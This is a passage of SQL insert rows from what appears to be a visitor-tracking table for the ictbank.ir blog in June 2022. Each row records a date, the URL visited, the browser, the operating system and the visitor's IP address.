(21504,'2022-06-05','http://ictbank.ir/blog','Unknown','Android','5.1',NULL,NULL,'','58.48.159.232','000',0,1,0),
(21505,'2022-06-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,8,0),
(21506,'2022-06-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(21507,'2022-06-05','http://wikisonnati.com/blog/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.82','000',0,2,0),
(21508,'2022-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.220.24','000',0,1,0),
(21509,'2022-06-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.165.190.17','000',0,2,0),
(21510,'2022-06-05','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.211.94.220','000',0,2,0),
(21511,'2022-06-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(21512,'2022-06-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.187.177','000',0,1,0),
(21513,'2022-06-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(21514,'2022-06-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21515,'2022-06-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','171.12.10.232','000',0,1,0),
(21516,'2022-06-05','http://82.102.9.14:80/','Chrome','Windows','10.0',NULL,NULL,'','77.121.92.243','000',0,2,0),
(21517,'2022-06-05','http://ictbank.ir/blog/index.php/category/web-security/wordpress-web-security/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.8','000',0,7,0),
(21518,'2022-06-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,18,0),
(21519,'2022-06-06','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.121','000',0,3,0),
(21520,'2022-06-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(21521,'2022-06-06','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.83','000',0,2,0),
(21522,'2022-06-06','http://ictbank.ir/blog','Internet Explorer','Windows','5.2',NULL,NULL,'','208.80.194.122','000',0,3,0),
(21523,'2022-06-06','http://ictbank.ir/blog/index.php/category/database/mssql/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.8','000',0,7,0),
(21524,'2022-06-06','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.175.236.48','000',0,1,0),
(21525,'2022-06-06','http://ictbank.ir/blog','Internet Explorer','Windows','5.2',NULL,NULL,'','208.80.194.126','000',0,1,0),
(21526,'2022-06-06','http://ictbank.ir/blog/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.144','000',0,8,0),
(21527,'2022-06-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','116.249.64.65','000',0,1,0),
(21528,'2022-06-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,9,0),
(21529,'2022-06-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.212.58','000',0,1,0),
(21530,'2022-06-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(21531,'2022-06-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(21532,'2022-06-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(21533,'2022-06-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.185.73','000',0,1,0),
(21534,'2022-06-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(21535,'2022-06-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.201.9.12','000',0,1,0),
(21537,'2022-06-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.243','000',0,2,0),
(21538,'2022-06-06','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.117.203','000',0,1,0),
(21539,'2022-06-06','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.26.182.26','000',0,1,0),
(21540,'2022-06-06','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.8','000',0,1,0),
(21541,'2022-06-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(21542,'2022-06-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.6','000',0,2,0),
(21543,'2022-06-06','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','27.115.124.101','000',0,1,0),
(21544,'2022-06-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(21545,'2022-06-07','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','208.80.194.121','000',0,1,0),
(21546,'2022-06-07','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.171','000',0,1,0),
(21547,'2022-06-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,6,0),
(21548,'2022-06-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(21549,'2022-06-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','150.255.126.76','000',0,1,0),
(21550,'2022-06-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.29','000',0,2,0),
(21551,'2022-06-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(21552,'2022-06-07','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.34','000',0,2,0),
(21553,'2022-06-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.24','000',0,2,0),
(21554,'2022-06-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','109.239.58.107','000',0,2,0),
(21555,'2022-06-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.42','000',0,1,0),
(21556,'2022-06-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.45','000',0,4,0),
(21557,'2022-06-07','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.30.89','000',0,1,0),
(21558,'2022-06-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','199.249.230.87','000',0,1,0),
(21559,'2022-06-07','http://82.102.9.14/blog','Chrome','Android','11',NULL,NULL,'','45.141.157.180','000',0,2,0),
(21560,'2022-06-07','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(21561,'2022-06-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,9,0),
(21562,'2022-06-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.56','000',0,1,0),
(21563,'2022-06-07','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','3.66.75.129','000',0,1,0),
(21564,'2022-06-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.57','000',0,1,0),
(21565,'2022-06-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.53','000',0,1,0),
(21566,'2022-06-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.138','000',0,2,0),
(21567,'2022-06-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(21568,'2022-06-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.87.217.160','000',0,1,0),
(21569,'2022-06-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','20.117.158.71','000',0,2,0),
(21570,'2022-06-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.36','000',0,2,0),
(21571,'2022-06-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.44','000',0,1,0),
(21572,'2022-06-07','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.193.82.80','000',0,1,0),
(21573,'2022-06-07','http://82.102.9.14/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.122','000',0,2,0),
(21574,'2022-06-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,1,0),
(21575,'2022-06-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.63','000',0,1,0),
(21576,'2022-06-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(21577,'2022-06-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(21578,'2022-06-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(21579,'2022-06-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.138.158.186','000',0,1,0),
(21580,'2022-06-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(21581,'2022-06-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,10,0),
(21582,'2022-06-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.236.147.154','000',0,2,0),
(21583,'2022-06-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.113.31','000',0,1,0),
(21584,'2022-06-08','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','121.4.55.77','000',0,2,0),
(21585,'2022-06-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.29','000',0,4,0),
(21586,'2022-06-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.35','000',0,4,0),
(21587,'2022-06-08','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,2,0),
(21588,'2022-06-08','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,8,0),
(21589,'2022-06-08','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','188.165.87.102','000',0,1,0),
(21590,'2022-06-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.6','000',0,3,0),
(21591,'2022-06-08','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','95.181.218.74','000',0,13,0),
(21592,'2022-06-08','http://www.ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','107.172.229.103','000',0,2,0),
(21593,'2022-06-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.25','000',0,3,0),
(21594,'2022-06-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,10,0),
(21595,'2022-06-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.44','000',0,5,0),
(21596,'2022-06-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.21','000',0,3,0),
(21597,'2022-06-08','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','52.165.34.179','000',0,1,0),
(21598,'2022-06-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(21599,'2022-06-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.188.89','000',0,1,0),
(21600,'2022-06-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.49','000',0,3,0),
(21601,'2022-06-08','http://ictbank.ir/blog','Unknown','OS X','10.15',NULL,NULL,'','203.34.56.138','000',0,2,0),
(21602,'2022-06-08','http://ictbank.ir/blog','Unknown','Android','5.1',NULL,NULL,'','175.184.165.30','000',0,1,0),
(21603,'2022-06-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.27','000',0,1,0),
(21604,'2022-06-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(21605,'2022-06-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.41','000',0,1,0),
(21606,'2022-06-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(21607,'2022-06-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(21608,'2022-06-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(21609,'2022-06-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(21610,'2022-06-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.28','000',0,5,0),
(21611,'2022-06-08','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','164.90.135.191','000',0,2,0),
(21612,'2022-06-08','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','120.35.11.210','000',0,4,0),
(21613,'2022-06-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.79','000',0,2,0),
(21614,'2022-06-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.141.43.58','000',0,1,0),
(21615,'2022-06-09','http://ictbank.ir/blog','Chrome','Android','8.1.0',NULL,NULL,'','208.100.26.232','000',0,2,0),
(21616,'2022-06-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,10,0),
(21617,'2022-06-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','68.183.222.102','000',0,2,0),
(21618,'2022-06-09','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.121','000',0,2,0),
(21619,'2022-06-09','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,1,0),
(21620,'2022-06-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.32.199.75','000',0,2,0),
(21621,'2022-06-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.6','000',0,3,0),
(21622,'2022-06-09','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,3,0),
(21623,'2022-06-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','42.83.147.34','000',0,1,0),
(21624,'2022-06-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.32.159.160','000',0,1,0),
(21625,'2022-06-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(21626,'2022-06-09','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.86','000',0,2,0),
(21627,'2022-06-09','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.165','000',0,1,0),
(21628,'2022-06-09','http://ictbank.ir/blog','Sogou Explorer','Windows','6.1',NULL,NULL,'','47.105.42.166','000',0,2,0),
(21629,'2022-06-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(21630,'2022-06-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.76','000',0,4,0),
(21631,'2022-06-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.115.86','000',0,1,0),
(21632,'2022-06-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(21633,'2022-06-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(21634,'2022-06-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(21635,'2022-06-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.5','000',0,2,0),
(21636,'2022-06-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.200.114','000',0,2,0),
(21637,'2022-06-09','http://ictbank.ir/blog','Safari','OS X','10.6.7',NULL,NULL,'','3.66.75.129','000',0,1,0),
(21638,'2022-06-09','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.202','000',0,1,0),
(21639,'2022-06-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21640,'2022-06-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,5,0),
(21641,'2022-06-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.126','000',0,3,0),
(21642,'2022-06-10','http://ictbank.ir/blog','Unknown','OS X','10.13.4',NULL,NULL,'','168.90.199.252','000',0,13,0),
(21643,'2022-06-10','http://www.ictbank.ir/blog','Unknown','OS X','10.13.4',NULL,NULL,'','165.231.168.192','000',0,2,0),
(21644,'2022-06-10','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','196.244.192.232','000',0,2,0),
(21645,'2022-06-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(21646,'2022-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','150.255.46.175','000',0,1,0),
(21647,'2022-06-10','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','121.4.79.217','000',0,2,0),
(21648,'2022-06-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.136','000',0,2,0),
(21649,'2022-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.227.171.13','000',0,2,0),
(21650,'2022-06-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,10,0),
(21651,'2022-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.232.251.191','000',0,2,0),
(21652,'2022-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.77','000',0,1,0),
(21653,'2022-06-10','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','208.80.194.122','000',0,2,0),
(21654,'2022-06-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.102.6','000',0,1,0),
(21655,'2022-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.86.226','000',0,1,0),
(21656,'2022-06-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','5.161.127.99','000',0,1,0),
(21657,'2022-06-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.187.223','000',0,2,0),
(21658,'2022-06-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(21659,'2022-06-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.169.97','000',0,2,0),
(21660,'2022-06-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.123.152','000',0,1,0),
(21661,'2022-06-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(21662,'2022-06-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,2,0),
(21663,'2022-06-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(21664,'2022-06-10','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.61.188.52','000',0,2,0),
(21665,'2022-06-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.81','000',0,2,0),
(21666,'2022-06-10','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(21667,'2022-06-11','http://82.102.9.14:80/blog','Edge','Windows','10.0',NULL,NULL,'','68.98.180.243','000',0,1,0),
(21668,'2022-06-11','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','61.147.15.67','000',0,4,0),
(21669,'2022-06-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,10,0),
(21670,'2022-06-11','http://ictbank.ir/blog/index.php/tag/centos/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.144','000',0,14,0),
(21671,'2022-06-11','https://cn.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','121.32.93.43','000',0,1,0),
(21672,'2022-06-11','http://www.design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','106.53.82.40','000',0,2,0),
(21673,'2022-06-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(21674,'2022-06-11','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.186.137','000',0,3,0),
(21675,'2022-06-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(21676,'2022-06-11','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,3,0),
(21677,'2022-06-11','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,2,0),
(21678,'2022-06-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,1,0),
(21679,'2022-06-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,3,0),
(21680,'2022-06-11','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','193.56.254.35','000',0,2,0),
(21681,'2022-06-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.213.79.74','000',0,1,0),
(21682,'2022-06-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.128.53.126','000',0,2,0),
(21683,'2022-06-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(21684,'2022-06-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.63','000',0,1,0),
(21685,'2022-06-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(21686,'2022-06-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,1,0),
(21687,'2022-06-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(21688,'2022-06-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.45','000',0,2,0),
(21689,'2022-06-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','193.128.111.36','000',0,1,0),
(21690,'2022-06-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','193.128.108.251','000',0,1,0),
(21691,'2022-06-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','207.102.138.19','000',0,2,0),
(21692,'2022-06-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.185','000',0,4,0),
(21693,'2022-06-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','159.122.73.26','000',0,1,0),
(21694,'2022-06-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','169.57.65.232','000',0,1,0),
(21695,'2022-06-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','87.178.145.222','000',0,2,0),
(21696,'2022-06-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','83.175.118.162','000',0,2,0),
(21697,'2022-06-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.86.81.170','000',0,2,0),
(21698,'2022-06-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','18.209.36.90','000',0,2,0),
(21699,'2022-06-11','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','91.234.192.197','000',0,2,0),
(21700,'2022-06-12','http://ictbank.ir/blog','Unknown','Windows','6.1',NULL,NULL,'','64.124.51.154','000',0,5,0),
(21701,'2022-06-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.191.48','000',0,15,0),
(21702,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','87.178.145.222','000',0,2,0),
(21703,'2022-06-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,6,0),
(21704,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','66.203.112.168','000',0,2,0),
(21705,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','2.57.171.42','000',0,2,0),
(21706,'2022-06-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(21707,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.158.36.183','000',0,2,0),
(21708,'2022-06-12','http://ictbank.ir/blog','Safari','OS X','Unknown',NULL,NULL,'','45.89.174.41','000',0,1,0),
(21709,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','45.131.195.130','000',0,2,0),
(21710,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','193.128.114.34','000',0,1,0),
(21711,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','45.146.55.86','000',0,2,0),
(21712,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.101','000',0,4,0),
(21713,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','79.104.209.134','000',0,2,0),
(21714,'2022-06-12','http://ictbank.ir/blog','Firefox','OS X','10.6',NULL,NULL,'','208.80.194.121','000',0,2,0),
(21715,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.194','000',0,4,0),
(21716,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.126.74.153','000',0,2,0),
(21717,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.222.43.123','000',0,2,0),
(21718,'2022-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.30.83.59','000',0,2,0),
(21719,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.45','000',0,4,0),
(21720,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.148','000',0,4,0),
(21721,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.7','000',0,4,0),
(21722,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.135','000',0,4,0),
(21723,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.186','000',0,4,0),
(21724,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.222.43.168','000',0,4,0),
(21725,'2022-06-12','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','101.55.125.9','000',0,1,0),
(21726,'2022-06-12','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','194.60.86.159','000',0,1,0),
(21727,'2022-06-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(21728,'2022-06-12','http://ictbank.ir/blog','Unknown','OS X','10.9.2',NULL,NULL,'','94.247.172.129','000',0,2,0),
(21729,'2022-06-12','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','193.32.210.147','000',0,3,0),
(21730,'2022-06-12','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','37.19.196.183','000',0,1,0),
